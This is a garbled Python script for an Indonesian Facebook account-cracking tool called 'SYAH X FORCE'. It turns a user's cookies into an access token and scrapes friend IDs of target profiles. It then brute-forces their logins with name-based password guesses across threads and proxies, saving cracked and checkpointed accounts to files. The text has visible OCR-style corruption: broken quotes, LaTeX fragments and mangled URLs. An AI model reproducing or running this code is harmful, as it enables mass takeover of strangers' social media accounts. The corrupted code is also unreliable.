logger_id = re.search('name="logger_id" value="(.*?)", str(response4)).group(1)
auth_type = re.search('name="auth_type" value="(.*?)", str(response4)).group(1)
encrypted_post_body = re.search('name="encrypted_post_body" value="(.*?)", str(response4)).group(1)
return_format = re.search('name="return_format\\\\\\" value="(.*?)", str(response4)).group(1)
r.headers.update(('origin': 'https://m.facebook.com',referer': response3.url,'content-type': 'application/x-www-form-urlencoded',}) data = {'fb_dtsg': fb_dtsg,'jazoest': jazoest,'scope': scope,'display': display,'user_code': user_code,'logger_id': logger_id,'auth_type':
auth_type,'encrypted_post_body': encrypted_post_body,'return_format[]': return_format,} response5 = r.post('https://m.facebook.com{}\)'.format(action), data = data, cookies = {'cookie': your_cookies}\).text
windows_referer = re.search('window.location.href="(.*?)"', str(response5)).group(1).replace('\\', ")
r.headers.pop('content-type');r.headers.pop('origin')
r.headers.update({'referer': 'https://m.facebook.com/',})
response6 = r.get(windows_referer, cookies = {'cookie': your_cookies}).text
if 'Sukses!' in str(response6):
r.headers.update({'sec-fetch-mode': 'no-cors','referer': 'https://graph.facebook.com/','Host': 'graph.facebook.com','accept': '*/*','sec-fetch-dest':
'script','sec-fetch-site': 'cross-site',})
response7 = r.get(status_url, cookies = {'cookie': your_cookies}).text access_token = re.search("access_token": "(.*?)", str(response7)).group(1)
\operatorname{print}(f^{"}\setminus n [+] \text{ TOKEN : {access\_token}"})
tokenew = open(".token.txt","w").write(access_token)
cook= open(".cok.txt","w").write(your_cookies)
print("\n [+] LOGIN SUCCESFULLY | python run.py");exit()
except Exception as e:
print("[+] YOUR COOKIES INVALID")
os.system('rm -rf .token.txt && rm -rf .cok.txt')
print(e)
time.sleep(3)
back()
except:pass
#-----#
def menu(my_name,my_id):
token = open('.token.txt','r').read()
cok = open('.cok.txt','r').read()
except IOError
print('[x]COOKIES EXPIRED')
time.sleep(5)
login_lagi334()
os.system('clear')
banner()
ip = requests.get("https://api.ipify.org").text
au='[-] AUTHOR: RAFI X SIPERANA\n[-] FACEBOOK: FIRLIAMELIARIZKI\n[-] PUNYA MAS: RAFI\n[-] WHATSAPP: gk boleh aku dah ad yg punya\n[-]
GITHUB: pamtek kmu'
pengembang1=nel(au,style="cyan")
cetak(nel(pengembang1, title='[purple]AUTHOR INFORMATION'))
cetak(nel('WELCOME: %s I HOPE YOU ARE ALWAYS HAPPY:)'%(my_name)))
cetak(nel('YOUR ID : '+str(my_id)))
print(f' (
print(f' | YOUR IP : {ip} | ')
au='[01] PUBLIC FACEBOOK\n[02] PUBLIC RESULT FACEBOOK\n[03] LOGOUT/DELETE COOKIES'
pengembang1=nel(au,style="cyan")
cetak(nel(pengembang1, title='[purple]METHODE'))
print(' L
if Ilman in ['1']:
dump_massal()
elif Ilman in ['2']:
result()
elif Ilman in ['3']:
os.system('rm -rf .token.txt')
os.system('rm -rf .cookie.txt')
print('[!] SUCCES LOGOUT/DELETE COOKIES [!]')
exit()
print('[X] SELECT THATS TRUE [X]')
back()
def error():
jalan(f'{sir}[!] WAIT THE MINUTE YOU WILL BE REDIRECTED A FACEBOOK [!]{x}')
os.system("xdg-open https://www.facebook.com/Ilmanramdhanirahman")
back()
             ---[ HASIL-CRACK ]-----#
def result():
au='[01] YOUR OK RESULT\n[02] YOUR CP RESULT\n[03] BACK'
pengembang1=nel(au,style="cyan")
cetak(nel(pengembang1, title='[purple]RESULT'))
kz = input(f' | [?] SELECT | : ')
```

```
print('
if kz in ['2']:
try:vin = os.listdir('CP')
except FileNotFoundÉrror:
print('[!] FILE NOT FOUND [!]')
time.sleep(3)
back()
if len(vin)==0:
print('[!] YOU ARE NOT HAVE A RESULT CP [!]')
time.sleep(2)
back()
else:
cih = 0
lol = {}
for isi in vin:
try:hem = open('CP/'+isi,'r').readlines()
except:continue
cih+=1
if cih<10:
nom = "+str(cih)
lol.update({str(cih):str(isi)})
lol.update({nom:str(isi)})
print(f'[?]%s. %s [{k} %s {x} ID ]'%(nom,isi,len(hem)))
else:
lol.update({str(cih):str(isi)})
print('[?]'+str(cih)+' '+isi+' [ '+str(len(hem))+' ID ]'+x)
geeh = input('\n[?] SELECT : ')
try:geh = lol[geeh]
except KeyError:
print('[X] SELECT THATS TRUE [X]')
try:lin = open('CP/'+geh,'r').read().splitlines()
print('[!] FILE NOT FOUND [!]')
time.sleep(2)
back()
nocp=0
for cpku in range(len(lin)):
cpkuni=lin[nocp].split('|')
print(f'\{x\} \sqsubseteq \{k\}\{cpkuni[0]\}|\{cpkuni[1]\}')
nocp +=1
print(")
input(f'[!]{x}[{m} CLICK ENTER{x} [!]')
back()
elif kz in ['1']:
try:vin = os.listdir('OK')
except FileNotFoundError:
print('[!] FILE NOT FOUND [!]')
time.sleep(2)
back()
if len(vin)==0:
print('[!] YOU ARE NOT HAVE A RESULT CP [!]')
time.sleep(2)
back()
else:
cih = 0
lol = {}
for isi in vin:
try:hem = open('OK/'+isi,'r').readlines()
except:continue
cih+=1
if cih<10:
nom = '0'+str(cih)
lol.update({str(cih):str(isi)})
lol.update({nom:str(isi)})
print(f'[!] %s. %s [ {h}%s{x} ID ]'%(nom,isi,len(hem)))
lol.update({str(cih):str(isi)})
print(f'[!] %s. %s [{h} %s {x}ID ]'%(cih,isi,(len(hem))))
geeh = input(f'\n[?] SELECT:')
try:geh = lol[geeh]
except KeyError:
print('[X] SELECT THATS TRUE [X]')
back()
try:lin = open('OK/'+geh,'r').read().splitlines()
except:
print('[!] FILE NOT FOUND [!]')
time.sleep(2)
back()
nocp=0
for cpku in range(len(lin)):
cpkuni=lin[nocp].split('|')
```

```
print(")
print(f'\{x\} \sqsubseteq \{h\}\{cpkuni[0]\}|\{cpkuni[1]\}|\{cpkuni[2]\}')
nocp +=1
print(")
input(f'[!]{x}[{m} CLICK ENTER{x} [!]')
back()
elif kz in ['3']:
back()
else:
print('[X] SELECT THATS TRUE [X]')
back()
           ---[ CRACK-PUBLIK ]-----#
def dump_massal():
trv:
token = open('.token.txt','r').read()
cok = open('.cok.txt','r').read()
except IOError:
exit()
try:
au='[!] MAKE SURE THE ID OF THE TARGET FRIEND IS PUBLIC [!]'
pengembang1=nel(au,style="cyan")
cetak(nel(pengembang1, title='[purple][!] ATTENTION WARNING [!]'))
print(' _
jum = int(input(' | [?] CHOOSE HOW MANY TARGETS | : '))
print(' -
except ValueError:
print('[X] ENTER NUMBERS, NOT LETTERS [X]')
if jum<1 or jum>100:
print('[X] FAILED TO CHECK ID [X]')
exit()
ses=requests.Session()
yz = 0
for met in range(jum):
yz+=1
kl = input(f' | [+] ENTER ID TARGET | '+str(yz)+ ' : ')
print(' L
uid.append(kl)
for userr in uid:
trv
col = ses.get('https://graph.facebook.com/v2.0/'+userr+'?fields=friends.limit(5000)&access_token='+tokenku[0], cookies = {'cookies':cok}).json()
for mi in col['friends']['data']:
iso = (mi['id']+'|'+mi['name'])
if iso in id:pass
else:id.append(iso)
except:continue
except (KeyError,IOError):
except requests.exceptions.ConnectionError:
print('[X] NETWORK ERROR, TRY AGAIN [X]')
exit()
try:
print(f' _
print(f' | [+] TOTAL ID RESULT | : '+str(len(id)))
print(f' L
setting()
except requests.exceptions.ConnectionError:
print('[X] NETWORK ERROR, TRY AGAIN [X]')
back()
except (KeyError,IOError):
print(f'[X]{k} TEMAN IS NOT A PUBLIC [X]{x}')
time.sleep(3)
back()
         -[ PENGATURAN-ID ]-----#
def setting():
au='[01] ACCOUNT ID OLD\n[02] ACCOUNT ID NEW\n[03] ACCOUNT ID RANDOM'
pengembang1=nel(au,style="cyan")
cetak(nel(pengembang1, title='[purple]METHODE'))
print(' _
                         ר' ר
hu = input(' | [?] SELECT | : ')
print(' -
if hu in ['1','01']:
for tua in sorted(id):
id2.append(tua)
elif hu in ['2','02']:
muda=[]
```

```
for bacot in sorted(id):
muda.append(bacot)
bcm=len(muda)
bcmi=(bcm-1)
for xmud in range(bcm):
id2.append(muda[bcmi])
bcmi -=1
elif hu in ['3','03']:
for bacot in id:
xx = random.randint(0,len(id2))
id2.insert(xx,bacot)
print('[X] SELECT THATS TRUE [X]')
au='[01] MOBILE FACEBOOK\n[02] MBASIC FACEBOOK'
pengembang1=nel(au,style="cyan")
cetak(nel(pengembang1, title='[purple]METHODE'))
###print(' |---> 3. bbh ')
###print(' |---> 4. Mfreefb')
print(' ____
hc = input(' | [?] SELECT | : ')
print('
if hc in ['1','01']:
method.append('mobile')
elif hc in ['2','02']:
method.append('free')
elif hc in ['3','03']:
method.append('touch')
elif hc in ['4','04']:
method.append('mbasic')
else:
method.append('mobile')
print(' _
_ilman_ = input(' | [Y/T] SHOW RELATED APPS | : ')
if _ilman_ in ["]:
print('[X] SELECT THATS TRUE [X]')
back()
elif _ilman_ in ['y','Y']:
taplikasi.append('ya')
taplikasi.append('no')
pwplus=input(' | [Y/T] SHOW ADD PASSWORD MANUALLY | : ')
print(' \
if pwplus in ['y','Y']:
pwpluss.append('ya')
au='[!] EXAMPLE : idonesia, bandung, majalengka. [!]'
pengembang1=nel(au,style="cyan")
cetak(nel(pengembang1, title='[purple][!] INPUT PASSWORD MANUALLY [!]'))
pwku=input(' | [?] ADD PASSWORD MANUALLY | : ')
print(' -
pwkuh=pwku.split(',')
for xpw in pwkuh:
pwnya.append(xpw)
else:
pwpluss.append('no')
passwrd()
             --[ BAGIAN-WORDLIST ]-----#
def passwrd():
au='[!] PROCESS IS RUNNING PLEASE WAIT [!]'
pengembang1=nel(au,style="cyan")
cetak(nel(pengembang1, title='[purple][!] ATTENTION WARNING [!]'))
print(f' | [!] RESULT OK WILL SAVE IN FOLDER: OK/%s | '%(okc))
print(f' | [!] RESULT CP WILL SAVE IN FOLDER : CP/%s | '%(cpc))
print('
au='[!] IF THERE IS NO RESULT IN 500 ID PLAY AIRPLANE EVERY 10 SECOND [!]'
pengembang1=nel(au,style="cyan")
cetak(nel(pengembang1, title='[purple][!] ATTENTION WARNING [!]'))
with tred(max_workers=30) as pool:
for yuzong in id2:
idf,nmf = yuzong.split('|')[0],yuzong.split('|')[1].lower()
frs = nmf.split(' ')[0]
pwv = []
if len(nmf)<6:
if len(frs)<3:
pass
```

```
pwv.append(frs+'1234')
pwv.append(frs+'12345')
else:
if len(frs)<3:
pwv.append(nmf)
else:
pwv.append(nmf)
pwv.append(frs+'123')
pwv.append(frs+'1234')
pwv.append(frs+'12345')
if 'ya' in pwpluss:
for xpwd in pwnya:
pwv.append(xpwd)
else:pass
if 'mobile' in method:
pool.submit(crack,idf,pwv)
elif 'free' in method:
pool.submit(crackfree.idf.pwv)
elif 'touch' in method:
pool.submit(cracktouch,idf,pwv)
elif 'mbasic' in method:
pool.submit(crackmbasic,idf,pwv)
pool.submit(crackmbasic,idf,pwv)
au='[!] PROCESS SUCCESFULLY [!]'
pengembang1=nel(au,style="cyan")
cetak(nel(pengembang1, title='[purple][!] ATTENTION WARNING [!]'))
print(f' | [!] RESULT ACCOUNT OK: %s | '%(ok))
print(f' | [!] RESULT ACCOUNT CP: %s | '%(cp))
print(' l
                  ---[ METODE-B-API ]-----
def crack(idf,pwv):
global loop,ok,cp
bo = random.choice([m,k,h,b,u,x])
sys.stdout.write(f"\r SYAH>_{P}b)\{loop\}{P}/\{u\}\{len(id)\}{P}\ OK\ \{P\}\{H\}\{ok\}\{P\}\ CP\ \{P\}\{k\}\{cp\}\{x\}: \{bo\}\{'\{:.0\%\}'.format(loop/float(len(id)))\}\{P\}''\},
sys.stdout.flush()
nip=random.choice(prox)
proxs= {'http': 'socks4://'+nip}
ua = random.choice(ugen)
ua2 = random.choice(ugen2)
ses = requests.Session()
for pw in pwv:
try
ses.headers.update({'Host': 'm.facebook.com';cache-control': 'max-age=0','sec-ch-ua-mobile': '?1','upgrade-insecure-requests': '1','user-agent':
ua,'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*,q=0.8,application/signed-
exchange;v=b3;q=0.9','sec-fetch-site': 'same-origin','sec-fetch-mode': 'cors','sec-fetch-dest': 'empty','accept-language': 'id-ID,id;q=0.9,en-
US;q=0.8,en;q=0.7'
p = ses.get('https://m.facebook.com/login/device-based/password/?
uid='+idf+'&flow=login_no_pin&next=https%3A%2F%2Fm.facebook.com%2Fv2.3%2Fdialog%2Foauth%3Fapp_id%3D124024574287414%26cbt%3D1651
23f8-463c-8660-
5cf1226d97f6%2522%252C%25227_challenge%2522%253A%2522dahj28hqtietmhrgprpp%2522%252C%25223_method%2522%253A%2522custom_tal
23f8-463c-8660-
5cf1226d97f6%26tp%3Dunspecified&cancel_url=fbconnect%3A%2F%2Fcct.com.instathunder.app%3Ferror%3Daccess_denied%26error_code%3D200%.
23f8-463c-8660-
5cf1226d97f6%2522%252C%25227_challenge%2522%253A%2522dahj28hqtietmhrqprpp%2522%252C%25223_method%2522%253A%2522custom_tal
dataa ={"lsd":re.search('name="lsd" value="(.*?)", str(p.text)).group(1),"jazoest":re.search('name="jazoest" value="(.*?)",
str(p.text)).group(1),"uid":idf,"next":"https://m.facebook.com/v2.3/dialog/oauth?
app_id=124024574287414&cbt=1651658200978&e2e=%7B%22init%22%3A1651658200978%7D&sso=chrome_custom_tab&scope=email&state=%7B%
23f8-463c-8660-
5cf1226d97f6%22%2C%227_challenge%22%3A%22dahj28hgtietmhrgprpp%22%2C%223_method%22%3A%22custom_tab%22%7D&redirect_uri=fbconn
23f8-463c-8660-5cf1226d97f6&tp=unspecified","flow":"login_no_pin","pass":pw,}
koki = (";").join([ "%s=%s" % (key, value) for key, value in p.cookies.get_dict().items() ])
koki+=' m_pixel_ratio=2.625; wd=412x756'
heade={'Host': 'm.facebook.com',cache-control': 'max-age=0','sec-ch-ua': " Not A;Brand",v="99", "Chromium";v="98",'sec-ch-ua-mobile': '?1','sec-ch-ua-mobile': '?1','sec-ch
platform': "Android", upgrade-insecure-requests': '1', origin': 'https://m.facebook.com', content-type': 'application/x-www-form-urlencoded', user-agent':
ua,'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-
exchange;v=b3;q=0.9','x-requested-with': 'XMLHttpRequest','sec-fetch-site': 'same-origin','sec-fetch-mode': 'cors','sec-fetch-dest': 'empty','referer':
'https://m.facebook.com/login/device-based/password/?
uid='+idf+'&flow=login_no_pin&next=https%3A%2F%2Fm.facebook.com%2Fv2.3%2Fdialog%2Foauth%3Fapp_id%3D124024574287414%26cbt%3D1651
23f8-463c-8660-
5cf1226d97f6%2522%252C%25227_challenge%2522%253A%2522dahj28hqtietmhrgprpp%2522%252C%25223_method%2522%253A%2522custom_tal
23f8-463c-8660-
5cf1226d97f6%26tp%3Dunspecified&cancel_url=fbconnect%3A%2F%2Fcct.com.instathunder.app%3Ferror%3Daccess_denied%26error_code%3D200%;
23f8-463c-8660-
5cf1226d97f6%2522%252C%25227_challenge%2522%253A%2522dahj28hqtietmhrgprpp%2522%252C%25223_method%2522%253A%2522custom_tal
encoding': 'gzip, deflate, br','accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'}
po = ses.post('https://m.facebook.com/login/device-based/validate-password/?shbl=0&locale2=id_ID',data=dataa,cookies={'cookie':
```

else:

pwv.append(frs+'123')

koki},headers=heade,allow\_redirects=False)

```
if "checkpoint" in po.cookies.get_dict().keys():
print(f'\r ID : {K}{idf}{P}
                                                   \n PASSWORD : {K}{pw}
                                                                                                          \{P\}\n UA : \{U\}\{ua\}\{U\}
                                                                                                                                                           \n')
open('najisCP/'+cpc,'a').write(idf+'|'+pw+'\n')
akun.append(idf+'|'+pw)
cp+=1
break
elif "c_user" in ses.cookies.get_dict().keys():
0k+=1
coki=po.cookies.get_dict()
kuki = (";").join([ "%s=%s" % (key, value) for key, value in ses.cookies.get_dict().items() ])
print(f'\setminus r \mid D : \{H\}\{idf\}\{P\}\setminus n \mid PASSWORD : \{H\}\{pw\} \mid P\}\setminus n \mid PASSWORD : \{H\}\{pw\} \mid PASSWORD 
open('ezOK/'+okc,'a').write(idf+'|'+pw+'|'+ua+'\n')
cek_apk(session,coki)
break
else:
continue
except requests.exceptions.ConnectionError:
time.sleep(31)
loop+=1
                      --[ METHODE-MBASIC-2 ]-----#
def crackfree(idf,pwv):
global loop,ok,cp
bo = random.choice([m,k,h,b,u,x])
sys.stdout.write(f"\r \--->[SYAH] {P}{b}{loop}{P}/{u}{len(id)}{P} OK {P}{H}{ok}{P} CP {P}{k}{cp}{x} : {bo}{'{:.0%}'.format(loop/float(len(id))))}{P} "),
sys.stdout.flush()
nip=random.choice(prox)
proxs= {'http': 'socks5://'+nip}
ua = random.choice(ugen)
ua2 = random.choice(ugen2)
ses = requests.Session()
for pw in pwv:
ses.headers.update({"Host":'mbasic.facebook.com',"upgrade-insecure-requests":"1","user-
agent":ua2,"accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*[inserted by cython to avoid
comment closer]/[inserted by cython to avoid comment start]*:g=0.8,application/signed-exchange;v=b3;g=0.9","dnt":"1","x-requested-
with":"mark.via.gp,",sec-fetch-site":"same-origin",sec-fetch-mode":"cors",sec-fetch-user":"empty",sec-fetch-dest":"document",referer":"https://m.facebook.com/",accept-encoding":"gzip, deflate br",accept-language":"en-GB,en-US;q=0.9,en;q=0.8"})
p = ses.get('https://mbasic.facebook.com/login.php?
skip_api_login=1&api_key=1862952583919182&kid_directed_site=0&app_id=1862952583919182&signed_next=1&next=https%3A%2F%2Fmbasic.facel
0810-47b0-8640-
39adfbf98cfd%26tp%3Dunspecified&cancel_url=https%3A%2F%2Fwww.tiktok.com%2Flogin%2F%3Ferror%3Daccess_denied%26error_code%3D200%26
dataa ={"lsd":re.search('name="lsd" value="(.*?)", str(p)).group(1),"jazoest":re.search('name="jazoest" value="(.*?)",
str(p)).group(1),"uid":idf,"flow":"login_no_pin","pass":pw,"next":"https://developers.facebook.com/tools/debug/accesstoken/"}
ses.headers.update({"Host": 'mbasic.facebook.com', "cache-control": "max-age=0", "upgrade-insecure-
requests":"1","origin":"https://m.facebook.com","content-type":"application/x-www-form-urlencoded","user-
agent":ua,"accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*[inserted by cython to avoid comment
closer]/[inserted by cython to avoid comment start]*;q=0.8,application/signed-exchange;y=b3;q=0.9","x-requested-with":"mark.via.gp","sec-fetch-
site":"same-origin","sec-fetch-mode":"cors","sec-fetch-user":"empty","sec-fetch-dest":"document","referer":"https://m.facebook.com/index.php?
next=https%3A%2F%2Fdevelopers.facebook.com%2Ftools%2Fdebug%2Faccesstoken%2F","accept-encoding":"gzip, deflate br","accept-language":"en-
GB,en-US;q=0.9,en;q=0.8"})
po = ses.post('https://mbasic.facebook.com/login/device-based/validate-password/?shbl=0',data=dataa,allow_redirects=False)
if "checkpoint" in po.cookies.get_dict().keys():
print(f'\r \sqcup ID : \{K\}\{idf\}\{P\}\}
                                                       \n PASSWORD : {K}{pw}
                                                                                                                                  {P}\n └── UA : {M}{ua}{M}
                                                                                                                                                                                             \n')
open('PPKCP/'+cpc,'a').write(idf+'|'+pw+'\n')
akun.append(idf+'|'+pw)
cp+=1
break
elif "c_user" in ses.cookies.get_dict().keys():
coki=po.cookies.get_dict()
kuki = (",").join([ "%s=%s" % (key, value) for key, value in ses.cookies.get_dict().items() ])
                   --- ID : {H}{idf}{P}
                                                         \{P\}\setminus USER\ AGENT: \{M\}\{ua\}\{M\}\setminus n'\}
open('ezOK/'+okc,'a').write(idf+'|'+pw+'|'+ua+'\n')
cek_apk(session,coki)
break
else:
continue
except requests.exceptions.ConnectionError:
time.sleep(31)
                      -----[ SYSTEM-CONTROL ]-----#
if __name__=='__main__':
try:os.system('git pull')
except:pass
try:os.mkdir('OK')
except:pass
try:os.mkdir('CP')
except:pass
try:os.mkdir('/sdcard/SYAH-XD')
except:pass
```

try:os.system('touch.prox.txt')
except:pass
try:os.system('clear')
except:pass
ilman(f'\n\t {h}HALLO THIS IS SCRIPT SYAH X FORCE, ENJOY USE THIS SCRIPT :>{x} ')
time.sleep(3)
login()

#SYAH X FORCE